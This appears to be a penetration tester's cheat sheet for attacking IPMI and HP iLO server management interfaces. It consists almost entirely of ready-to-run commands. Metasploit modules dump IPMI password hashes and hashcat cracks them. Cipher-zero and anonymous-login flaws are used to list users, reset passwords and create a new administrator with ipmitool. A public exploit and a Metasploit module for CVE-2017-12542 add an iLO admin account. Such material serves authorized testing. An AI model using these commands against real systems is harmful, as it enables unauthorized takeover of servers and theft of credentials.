| description |
|---|
Intelligent Platform Management Interface |
- https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/
- https://habr.com/ru/company/selectel/blog/439834/
msf > use auxiliary/scanner/ipmi/ipmi_version
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run
CVE-2013-4786
Dump hashes:
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf > set OUTPUT_HASHCAT_FILE ipmi_hashes.txt
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run
Recover plaintext passwords:
$ hashcat -m 7300 -O -a 0 -w 4 --session=ipmi -o ipmi.out ipmi.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule --username
CVE-2013-4805
Discover with MSF:
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run
Guess existing admin username. If ADMIN username is correct, the list command will succeed (password doesn't matter):
$ sudo apt install ipmitool
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user list
Add new admin user (only existing admin username is needed):
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set name <ID> snovvcrash
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set password <ID> 'Passw0rd!'
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user priv <ID> 4
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user enable <ID>
Can be discovered with MSF ipmi_dumphashes but also with ipmitool:
$ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user list
Change password of a named user account:
$ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user set password <ID> 'Passw0rd!'
- https://codeby.net/threads/poluchaem-dostup-k-hp-ilo.63224/
- https://github.com/airbus-seclab/ilo4_toolbox
CVE-2017-12542
Exploit with Python:
$ ./44005.py -t -e -u snovvcrash -p 'Passw0rd!' 127.0.0.1
Exploit with MSF:
msf > use auxiliary/admin/hp/hp_ilo_create_admin_account
msf > set RHOSTS 10.10.13.37
msf > set USERNAME snovvcrash
msf > run